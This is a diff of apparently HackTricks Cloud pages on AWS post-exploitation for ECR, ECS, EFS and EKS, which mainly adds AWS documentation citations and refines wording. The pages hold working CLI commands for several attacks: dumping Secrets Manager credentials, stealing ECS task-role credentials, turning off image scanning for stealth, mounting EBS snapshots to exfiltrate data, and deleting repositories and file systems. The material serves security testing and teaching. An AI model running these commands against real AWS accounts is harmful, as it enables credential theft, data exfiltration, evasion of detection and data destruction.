-If a Lambda function is deployed as a **container image** (`PackageType=Image`) and uses an **ECR tag** (e.g., `:stable`, `:prod`) instead of a digest, overwriting that tag can turn supply-chain tampering into **code execution inside the Lambda execution role** once the function is refreshed.
+If a Lambda function is deployed as a **container image** (`PackageType=Image`) and uses an **ECR tag** (e.g., `:stable`, `:prod`) instead of a digest, Lambda resolves that tag to a digest during a function-code update and does not automatically follow later tag changes. If a refresh occurs after the overwrite, the update can therefore deploy attacker-selected code under the Lambda execution role.<sup>[[9]](#references)[[12]](#references)</sup>
 
 How to enumerate this situation:
+
+`ListFunctions` exposes `PackageType`, and `GetFunction` exposes the configured `Code.ImageUri`, which can be reviewed for tag references versus digest pinning.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 REGION=us-east-1
@@ -106,20 +110,22 @@ tr '\t' '\n' | while read -r fn; do
   [ -n "$img" ] && printf '%s\t%s\n' "$fn" "$img"
 done
 
-# 2) Check whether a function references a mutable tag (contains ":<tag>")
-# Prefer digest pinning (contains "@sha256:") in well-hardened deployments.
+# 2) Review each ImageUri: a digest-pinned reference contains "@sha256:";
+#    a trailing ":<tag>" is a mutable-reference candidate.
 ```
 
 How refresh often happens:
 
-- CI/CD or GitOps regularly calls `lambda:UpdateFunctionCode` (even with the same `ImageUri`) to force Lambda to resolve the tag again.
-- Event-driven automation listens for ECR image events (push/tag updates) and triggers a refresher Lambda/automation.
+- CI/CD or GitOps calls `lambda:UpdateFunctionCode` with the image tag to deploy a newly resolved digest.<sup>[[9]](#references)</sup>
+- Event-driven automation listens for ECR image-push events and triggers a refresher Lambda or other automation.<sup>[[22]](#references)</sup>
 
-If you can overwrite the trusted tag and a refresh mechanism exists, the next invocation of the function will run attacker-controlled code, which can then read environment variables, access network resources, and call AWS APIs using the Lambda role (for example, `secretsmanager:GetSecretValue`).
+If you can overwrite the trusted tag and a refresh mechanism exists, a subsequent invocation can run attacker-controlled code under the function's execution role. That code can read environment variables, access resources available through the function's network configuration, and invoke AWS APIs allowed by the role, such as `secretsmanager:GetSecretValue` when granted.<sup>[[12]](#references)[[13]](#references)[[27]](#references)</sup>
 
 ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`
 
-An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository.
+These permissions have separate destructive effects: `ecr:PutLifecyclePolicy` can schedule matching images for expiration, `ecr:BatchDeleteImage` removes selected tags or images, and the repository-delete actions remove repositories (with `--force` deleting their contents). Holding one permission does not imply the others; a complete wipe requires the relevant combination.<sup>[[14]](#references)[[15]](#references)[[16]](#references)[[17]](#references)[[18]](#references)[[19]](#references)</sup>
+
+Lifecycle expiration is asynchronous and can take up to 24 hours after an image meets the policy criteria, while `--force` requests repository/content deletion in the repository-delete call.<sup>[[15]](#references)[[16]](#references)[[18]](#references)</sup>
 
 ```bash
 # Create a JSON file with the malicious lifecycle policy
@@ -159,7 +165,7 @@ aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-i
 
 ### Exfiltrate upstream registry credentials from ECR Pull‑Through Cache (PTC)
 
-If ECR Pull‑Through Cache is configured for authenticated upstream registries (Docker Hub, GHCR, ACR, etc.), the upstream credentials are stored in AWS Secrets Manager with a predictable name prefix: `ecr-pullthroughcache/`. Operators sometimes grant ECR admins broad Secrets Manager read access, enabling credential exfiltration and reuse outside AWS.
+If ECR Pull‑Through Cache is configured for authenticated upstream registries (Docker Hub, GHCR, ACR, etc.), the configured credentials are stored in an AWS Secrets Manager secret whose name must begin with `ecr-pullthroughcache/` and whose account and Region must match the cache rule. A principal that can list and read those secrets can retrieve the upstream credential and may be able to reuse it outside AWS, subject to the upstream credential's scope.<sup>[[20]](#references)[[21]](#references)</sup>
 
 Requirements
 - secretsmanager:ListSecrets
@@ -179,28 +185,30 @@ for s in $(aws secretsmanager list-secrets \
   aws secretsmanager get-secret-value --secret-id "$s" \
     --query SecretString --output text | tee /tmp/ptc_secret.json
   jq -r '.username? // .user? // empty' /tmp/ptc_secret.json || true
-  jq -r '.password? // .token? // empty' /tmp/ptc_secret.json || true
+  jq -r '.accessToken? // .password? // .token? // empty' /tmp/ptc_secret.json || true
 done
 ```
 
 Optional: validate leaked creds against the upstream (read‑only login)
 ```bash
-echo "$DOCKERHUB_PASSWORD" | docker login --username "$DOCKERHUB_USERNAME" --password-stdin registry-1.docker.io
+echo "$DOCKERHUB_ACCESS_TOKEN" | docker login --username "$DOCKERHUB_USERNAME" --password-stdin registry-1.docker.io
 ```
 
 Impact
-- Reading these Secrets Manager entries yields reusable upstream registry credentials (username/password or token), which can be abused outside AWS to pull private images or access additional repositories depending on upstream permissions.
+- Reading these Secrets Manager entries can yield reusable upstream credentials (for example, a username and access token), which may provide access to private images or additional repositories depending on upstream permissions.<sup>[[20]](#references)[[21]](#references)</sup>
 
 
 ### Registry-level stealth: disable or downgrade scanning via `ecr:PutRegistryScanningConfiguration`
 
-An attacker with registry-level ECR permissions can silently reduce or disable automatic vulnerability scanning for ALL repositories by setting the registry scanning configuration to BASIC without any scan-on-push rules. This prevents new image pushes from being scanned automatically, hiding vulnerable or malicious images.
+An attacker with registry-level ECR permissions can reduce automatic vulnerability scanning by setting the registry scanning configuration to BASIC without scan-on-push rules. With BASIC scanning, repositories that do not match a scan-on-push rule use the manual scan frequency, so new pushes are not scanned automatically.<sup>[[23]](#references)[[24]](#references)</sup>
 
 Requirements
 - ecr:PutRegistryScanningConfiguration
 - ecr:GetRegistryScanningConfiguration
-- ecr:PutImageScanningConfiguration (optional, per‑repo)
-- ecr:DescribeImages, ecr:DescribeImageScanFindings (verification)
+- ecr:PutImageScanningConfiguration (optional legacy per‑repo override)
+- ecr:DescribeImageScanFindings (verification)
+
+`PutImageScanningConfiguration` remains available for a repository-level override, but AWS is deprecating that API in favor of registry-level configuration.<sup>[[25]](#references)</sup>
 
 Registry-wide downgrade to manual (no auto scans)
 ```bash
@@ -208,7 +216,7 @@ REGION=us-east-1
 # Read current config (save to restore later)
 aws ecr get-registry-scanning-configuration --region "$REGION"
 
-# Set BASIC scanning with no rules (results in MANUAL scanning only)
+# Set BASIC scanning with no rules (repositories use MANUAL scanning)
 aws ecr put-registry-scanning-configuration \
   --region "$REGION" \
   --scan-type BASIC \
@@ -225,15 +233,14 @@ printf 'FROM alpine:3.19\nRUN echo STEALTH > /etc/marker\n' > Dockerfile
 docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${repo}:test .
 docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${repo}:test
 
-# Verify no scan ran automatically
-aws ecr describe-images --region "$REGION" --repository-name "$repo" --image-ids imageTag=test --query 'imageDetails[0].imageScanStatus'
-# Optional: will error with ScanNotFoundException if no scan exists
+# New BASIC scanning reports findings through DescribeImageScanFindings;
+# this returns ScanNotFoundException when no scan has run for the image.
 aws ecr describe-image-scan-findings --region "$REGION" --repository-name "$repo" --image-id imageTag=test || true
 ```
 
 Optional: further degrade at repo scope
 ```bash
-# Disable scan-on-push for a specific repository
+# Legacy API: disable scan-on-push for a specific repository
 aws ecr put-image-scanning-configuration \
   --region "$REGION" \
   --repository-name "$repo" \
@@ -241,42 +248,15 @@ aws ecr put-image-scanning-configuration \
 ```
 
 Impact
-- New image pushes across the registry are not scanned automatically, reducing visibility of vulnerable or malicious content and delaying detection until a manual scan is initiated.
+- New image pushes in repositories without a matching scan-on-push rule are not scanned automatically, reducing visibility until a manual scan is initiated. Switching between Enhanced and Basic scanning can also make established scan results unavailable until the previous configuration is restored.<sup>[[23]](#references)[[24]](#references)</sup>
 
 
-### Registry‑wide scanning engine downgrade via `ecr:PutAccountSetting` (AWS_NATIVE -> CLAIR)
+### Registry‑wide scanning engine downgrade via `ecr:PutAccountSetting` (obsolete)
 
-Reduce vulnerability detection quality across the entire registry by switching the BASIC scan engine from the default AWS_NATIVE to the legacy CLAIR engine. This doesn’t disable scanning but can materially change findings/coverage. Combine with a BASIC registry scanning configuration with no rules to make scans manual-only.
-
-Requirements
-- `ecr:PutAccountSetting`, `ecr:GetAccountSetting`
-- (Optional) `ecr:PutRegistryScanningConfiguration`, `ecr:GetRegistryScanningConfiguration`
-
-Impact
-- Registry setting `BASIC_SCAN_TYPE_VERSION` set to `CLAIR` so subsequent BASIC scans run with the downgraded engine. CloudTrail records the `PutAccountSetting` API call.
-
-Steps
-```bash
-REGION=us-east-1
-
-# 1) Read current value so you can restore it later
-aws ecr get-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION || true
-
-# 2) Downgrade BASIC scan engine registry‑wide to CLAIR
-aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value CLAIR
-
-# 3) Verify the setting
-aws ecr get-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION
-
-# 4) (Optional stealth) switch registry scanning to BASIC with no rules (manual‑only scans)
-aws ecr put-registry-scanning-configuration --region $REGION --scan-type BASIC --rules '[]' || true
-
-# 5) Restore to AWS_NATIVE when finished to avoid side effects
-aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value AWS_NATIVE
-```
+The historical `BASIC_SCAN_TYPE_VERSION=CLAIR` downgrade is obsolete: AWS completed the migration of all ECR accounts to AWS native basic scanning on February 2, 2026, and Clair is no longer an available basic-scanning implementation. The old `PutAccountSetting` procedure has therefore been removed; use the registry scanning configuration above when testing manual scanning behavior.<sup>[[26]](#references)</sup>
 
 
-### Scan ECR images for vulenrabilities
+### Scan ECR images for vulnerabilities
 
 ```bash
 #!/bin/bash
@@ -309,5 +289,35 @@ while read -r repo; do
     # docker image rm $url
 done < <(aws ecr describe-repositories --region $region --profile $profile --output json | jq -r '.repositories[] | .repositoryName')
 ```
+
+## References
+
+- [1] [AWS - ECR Enum](../../aws-services/aws-ecr-enum.md)
+- [2] [Private registry authentication in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry_auth.html)
+- [3] [Registry authentication in Amazon ECR public](https://docs.aws.amazon.com/AmazonECR/latest/public/public-registry-auth.html)
+- [4] [Docker Forensics](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.html)
+- [5] [batch-get-image — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/batch-get-image.html)
+- [6] [get-download-url-for-layer — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/get-download-url-for-layer.html)
+- [7] [PutImage - Amazon Elastic Container Registry](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_PutImage.html)
+- [8] [Preventing image tags from being overwritten in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-tag-mutability.html)
+- [9] [UpdateFunctionCode - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionCode.html)
+- [10] [ListFunctions - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_ListFunctions.html)
+- [11] [GetFunction - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_GetFunction.html)
+- [12] [Defining Lambda function permissions with an execution role - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html)
+- [13] [Working with Lambda environment variables - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-envvars.html)
+- [14] [put-lifecycle-policy — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/put-lifecycle-policy.html)
+- [15] [Automate the cleanup of images by using lifecycle policies in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html)
+- [16] [delete-repository — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/delete-repository.html)
+- [17] [batch-delete-image — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/batch-delete-image.html)
+- [18] [delete-repository — AWS CLI Command Reference for Amazon ECR Public](https://docs.aws.amazon.com/cli/latest/reference/ecr-public/delete-repository.html)
+- [19] [batch-delete-image — AWS CLI Command Reference for Amazon ECR Public](https://docs.aws.amazon.com/cli/latest/reference/ecr-public/batch-delete-image.html)
+- [20] [Creating a pull through cache rule in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache-creating-rule.html)
+- [21] [Storing your upstream repository credentials in an AWS Secrets Manager secret - Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/pull-through-cache-creating-secret.html)
+- [22] [Amazon ECR events and EventBridge](https://docs.aws.amazon.com/AmazonECR/latest/userguide/ecr-eventbridge.html)
+- [23] [put-registry-scanning-configuration — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/put-registry-scanning-configuration.html)
+- [24] [Scan images for software vulnerabilities in Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html)
+- [25] [put-image-scanning-configuration — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ecr/put-image-scanning-configuration.html)
+- [26] [Document history - Amazon ECR](https://docs.aws.amazon.com/AmazonECR/latest/userguide/doc-history.html)
+- [27] [Giving Lambda functions access to resources in an Amazon VPC - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/configuration-vpc.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - ECS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## ECS
 
 For more information check:
@@ -18,24 +16,25 @@ Which means that if you manage to **compromise** an ECS instance you can potenti
 {{#ref}}
 https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
 {{#endref}}
+<sup>[[2]](#references)[[3]](#references)</sup>
 
 > [!CAUTION]
-> IMDSv2 with a hop limit of 1 **does not** block awsvpc or host-networked tasks—only Docker bridge tasks sit far enough away for the responses to die. See [ECS-on-EC2 IMDS Abuse & ECS Agent Impersonation](../aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md#ecs-on-ec2-imds-abuse--ecs-agent-impersonation) for the full attack workflow and bypass notes. Recent [Latacora research](https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/) shows that awsvpc and host tasks still fetch host credentials even when IMDSv2+h=1 is enforced.
+> IMDSv2 with a hop limit of 1 **does not** block awsvpc or host-networked tasks—only Docker bridge tasks sit far enough away for the responses to die. See [ECS-on-EC2 IMDS Abuse & ECS Agent Impersonation](../aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md#ecs-on-ec2-imds-abuse--ecs-agent-impersonation) for the full attack workflow and bypass notes. Recent [Latacora research](https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/) shows that awsvpc and host tasks still fetch host credentials even when IMDSv2+h=1 is enforced.<sup>[[1]](#references)</sup>
 
 ### Privesc to node to steal other containers creds & secrets
 
-But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
+But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.<sup>[[3]](#references)</sup>
 
 #### Making containers run in current host
 
-Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container.
+If the compromised instance role or another principal can call `ecs:UpdateContainerInstancesState`, an attacker could modify the **state of an instance to DRAINING**. This prevents new placement and causes service tasks to be replaced on another instance when capacity and deployment settings allow it; standalone tasks may remain running. This can potentially place replica tasks on the **attacker's instance**, allowing them to **steal task IAM roles** and sensitive information from inside the containers.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 aws ecs update-container-instances-state \
     --cluster <cluster> --status DRAINING --container-instances <container-instance-id>
 ```
 
-The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:**
+The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy; running tasks become orphaned, while service schedulers may start replacement copies on other instances if possible.<sup>[[5]](#references)</sup>
 
 ```bash
 aws ecs deregister-container-instance \
@@ -43,6 +42,8 @@ aws ecs deregister-container-instance \
 ```
 
 A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this:
+
+AWS documents these `ecs:Submit*` operations as container-agent state-reporting APIs, so this technique depends on credentials that can call those agent-facing actions.<sup>[[2]](#references)</sup>
 
 ```bash
 # Needs: ecs:SubmitTaskStateChange
@@ -58,20 +59,20 @@ aws ecs submit-attachment-state-changes ...
 
 #### Join the Cluster With an Attacker Host (Register Container Instance)
 
-Another variant (more direct than draining) is to **add capacity you control** into the cluster by registering an EC2 instance as a container instance (`ecs:RegisterContainerInstance`) and setting the required container instance attributes so placement constraints match. Once tasks land on your host, you can inspect/exec into containers and harvest `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` credentials.
+Another variant (more direct than draining) is to **add capacity you control** into the cluster by registering an EC2 instance as a container instance (`ecs:RegisterContainerInstance`) and setting the required container instance attributes so placement constraints match. Once tasks land on your host, you can inspect/exec into containers and harvest `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` credentials.<sup>[[7]](#references)</sup>
 
 See the ECS privesc page section on `ecs:RegisterContainerInstance` for the full workflow.
 
 ### Steal sensitive info from ECR containers
 
-The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them).
+The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken`, which provides registry authentication; image downloads additionally require the relevant ECR read actions such as `ecr:BatchGetImage` and `ecr:GetDownloadUrlForLayer`. With those permissions, you can download images and search them for sensitive information.<sup>[[2]](#references)</sup>
 
 ### Steal Task Role Credentials via `ecs:ExecuteCommand`
 
-If `ExecuteCommand` is enabled on a task, a principal with `ecs:ExecuteCommand` + `ecs:DescribeTasks` can open a shell inside the running container and then query the **task credentials endpoint** to harvest the **task role** credentials:
+If `ExecuteCommand` is enabled on a task and its `ExecuteCommandAgent` is running, a principal with `ecs:ExecuteCommand` + `ecs:DescribeTasks` can open a shell inside the running container and then query the **task credentials endpoint** to harvest the **task role** credentials. The task must also satisfy ECS Exec's task-role and agent prerequisites.<sup>[[6]](#references)</sup>
 
-- From inside the container: `curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"`
-- Use the returned `AccessKeyId/SecretAccessKey/Token` to call AWS APIs as the task role
+- From inside the container: `curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"`<sup>[[2]](#references)</sup>
+- Use the returned `AccessKeyId/SecretAccessKey/Token` to call AWS APIs as the task role<sup>[[2]](#references)</sup>
 
 See the ECS privilege escalation page for enumeration and command examples.
 
@@ -83,21 +84,21 @@ See the ECS privilege escalation page for enumeration and command examples.
 
 ### Mount an EBS snapshot directly in an ECS task (configuredAtLaunch + volumeConfigurations)
 
-Abuse the native ECS EBS integration (2024+) to mount the contents of an existing EBS snapshot directly inside a new ECS task/service and read its data from inside the container.
+Abuse the native ECS EBS integration (2024+) to mount the contents of an existing EBS snapshot directly inside a new ECS task/service and read its data from inside the container.<sup>[[8]](#references)[[12]](#references)</sup>
 
 - Needs (minimum):
-  - ecs:RegisterTaskDefinition
-  - One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService
+  - ecs:RegisterTaskDefinition<sup>[[8]](#references)</sup>
+  - One of: ecs:RunTask OR ecs:CreateService/ecs:UpdateService<sup>[[8]](#references)</sup>
   - iam:PassRole on:
-    - ECS infrastructure role used for volumes (policy: `service-role/AmazonECSInfrastructureRolePolicyForVolumes`)
-    - Task execution/Task roles referenced by the task definition
-  - If the snapshot is encrypted with a CMK: KMS permissions for the infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).
+    - ECS infrastructure role used for volumes (policy: `service-role/AmazonECSInfrastructureRolePolicyForVolumes`)<sup>[[10]](#references)</sup>
+    - Task execution/Task roles referenced by the task definition<sup>[[10]](#references)</sup>
+  - If the snapshot is encrypted with a CMK, its key policy must grant the infrastructure role the permissions required for EBS encryption; snapshots require the re-encryption permissions in addition to the grant and data-key permissions.<sup>[[11]](#references)</sup>
 
-- Impact: Read arbitrary disk contents from the snapshot (e.g., database files) inside the container and exfiltrate via network/logs.
+- Impact: Read arbitrary disk contents from the snapshot (e.g., database files) inside the container and exfiltrate via network/logs.<sup>[[8]](#references)</sup>
 
 Steps (Fargate example):
 
-1) Create the ECS infrastructure role (if it doesn’t exist) and attach the managed policy:
+1) Create the ECS infrastructure role (if it doesn’t exist) and attach the managed policy:<sup>[[10]](#references)</sup>
 
 ```bash
 aws iam create-role --role-name ecsInfrastructureRole \
@@ -106,7 +107,7 @@ aws iam attach-role-policy --role-name ecsInfrastructureRole \
   --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes
 ```
 
-2) Register a task definition with a volume marked `configuredAtLaunch` and mount it in the container. Example (prints the secret then sleeps):
+2) Register a task definition with a volume marked `configuredAtLaunch` and mount it in the container. Example (prints the secret then sleeps):<sup>[[9]](#references)</sup>
 
 ```json
 {
@@ -128,7 +129,7 @@ aws iam attach-role-policy --role-name ecsInfrastructureRole \
 }
 ```
 
-3) Create or update a service passing the EBS snapshot via `volumeConfigurations.managedEBSVolume` (requires iam:PassRole on the infra role). Example:
+3) Create or update a service passing the EBS snapshot via `volumeConfigurations.managedEBSVolume` (requires iam:PassRole on the infra role). Example:<sup>[[8]](#references)[[10]](#references)</sup>
 
 ```json
 {
@@ -144,18 +145,32 @@ aws iam attach-role-policy --role-name ecsInfrastructureRole \
 }
 ```
 
-4) When the task starts, the container can read the snapshot contents at the configured mount path (e.g., `/loot`). Exfiltrate via the task’s network/logs.
+4) When the task starts, the container can read the snapshot contents at the configured mount path (e.g., `/loot`). Exfiltrate via the task’s network/logs.<sup>[[8]](#references)</sup>
 
 Cleanup:
+
+Use the task-definition revision returned by registration; the AWS CLI requires `family:revision` or a full ARN when deregistering it.<sup>[[13]](#references)</sup>
 
 ```bash
 aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count 0
 aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
-aws ecs deregister-task-definition ht-ebs-read
+aws ecs deregister-task-definition --task-definition ht-ebs-read:<revision>
 ```
 
 ## References
 
-- [Latacora - ECS on EC2: Covering Gaps in IMDS Hardening](https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/)
+- [1] [Latacora - ECS on EC2: Covering Gaps in IMDS Hardening](https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/)
+- [2] [AWS - Best practices for IAM roles in Amazon ECS](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/security-iam-roles.html)
+- [3] [AWS - Amazon ECS task IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html)
+- [4] [AWS - Draining Amazon ECS container instances](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/container-instance-draining.html)
+- [5] [AWS - Deregistering an Amazon ECS container instance](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deregister_container_instance.html)
+- [6] [AWS - Monitor Amazon ECS containers with ECS Exec](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-exec.html)
+- [7] [AWS - RegisterContainerInstance API](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterContainerInstance.html)
+- [8] [AWS - Specify Amazon EBS volume configuration at Amazon ECS deployment](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/configure-ebs-volume.html)
+- [9] [AWS - Defer volume configuration to launch time in an Amazon ECS task definition](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/specify-ebs-config.html)
+- [10] [AWS - Amazon ECS infrastructure IAM role](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/infrastructure_IAM_role.html)
+- [11] [AWS - Encrypt data stored in Amazon EBS volumes attached to Amazon ECS tasks](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ebs-kms-encryption.html)
+- [12] [AWS - Amazon ECS and AWS Fargate now integrate with Amazon EBS](https://aws.amazon.com/about-aws/whats-new/2024/01/amazon-ecs-fargate-integrate-ebs/)
+- [13] [AWS CLI - deregister-task-definition](https://docs.aws.amazon.com/cli/latest/reference/ecs/deregister-task-definition.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - EFS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EFS
 
 For more information check:
@@ -12,47 +10,58 @@ For more information check:
 
 ### `elasticfilesystem:DeleteMountTarget`
 
-An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target.
+An attacker able to invoke this action can remove a mount target, forcibly breaking mounts that use it and deleting its associated network interface. The operation also requires `ec2:DeleteNetworkInterface`; the EFS file system remains intact, although uncommitted writes may be lost.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```sql
 aws efs delete-mount-target --mount-target-id <value>
 ```
 
-**Potential Impact**: Disruption of file system access and potential data loss for users or applications.
+**Potential Impact**: Disruption of applications using that mount target; the operation itself does not corrupt the file system.<sup>[[1]](#references)</sup>
 
 ### `elasticfilesystem:DeleteFileSystem`
 
-An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system.
+An attacker with this permission can delete an EFS file system, permanently severing access to its contents. AWS requires attached mount targets to be removed first, so this action may be chained with `DeleteMountTarget`.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```perl
 aws efs delete-file-system --file-system-id <value>
 ```
 
-**Potential Impact**: Data loss and service disruption for applications using the deleted file system.
+**Potential Impact**: Permanent loss of access to the file system's contents and service disruption for dependent applications.<sup>[[3]](#references)</sup>
 
 ### `elasticfilesystem:UpdateFileSystem`
 
-An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion.
+An attacker with this permission can change the file system's throughput mode or provisioned throughput, altering its performance characteristics.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```sql
 aws efs update-file-system --file-system-id <value> --provisioned-throughput-in-mibps <value>
 ```
 
-**Potential Impact**: Degradation of file system performance or resource exhaustion.
+**Potential Impact**: Degradation or other unexpected changes to file system performance.<sup>[[5]](#references)</sup>
 
 ### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint`
 
-An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system.
+An attacker with `CreateAccessPoint` can choose the POSIX identity and root directory applied to requests through an access point, changing how clients reach data under that path. An attacker with `DeleteAccessPoint` can prevent new clients from connecting to the access point, although existing connections continue until they terminate.<sup>[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```arduino
 aws efs create-access-point --file-system-id <value> --posix-user <value> --root-directory <value>
 aws efs delete-access-point --access-point-id <value>
 ```
 
-**Potential Impact**: Unauthorized access to the file system, data exposure or modification.
+**Potential Impact**: Unauthorized access, data exposure, or data modification if a workload uses an attacker-controlled access point; deleting one can disrupt clients that rely on it.<sup>[[7]](#references)[[8]](#references)</sup>
+
+## References
+
+- [1] [DeleteMountTarget - Amazon Elastic File System API Reference](https://docs.aws.amazon.com/efs/latest/APIReference/API_DeleteMountTarget.html)
+- [2] [delete-mount-target - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/delete-mount-target.html)
+- [3] [DeleteFileSystem - Amazon Elastic File System API Reference](https://docs.aws.amazon.com/efs/latest/APIReference/API_DeleteFileSystem.html)
+- [4] [delete-file-system - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/delete-file-system.html)
+- [5] [UpdateFileSystem - Amazon Elastic File System API Reference](https://docs.aws.amazon.com/efs/latest/APIReference/API_UpdateFileSystem.html)
+- [6] [update-file-system - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/update-file-system.html)
+- [7] [CreateAccessPoint - Amazon Elastic File System API Reference](https://docs.aws.amazon.com/efs/latest/APIReference/API_CreateAccessPoint.html)
+- [8] [DeleteAccessPoint - Amazon Elastic File System API Reference](https://docs.aws.amazon.com/efs/latest/APIReference/API_DeleteAccessPoint.html)
+- [9] [create-access-point - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/create-access-point.html)
+- [10] [delete-access-point - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/delete-access-point.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md
@@ -1,10 +1,8 @@
 # AWS - EKS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## EKS
 
-For mor information check
+For more information check
 
 {{#ref}}
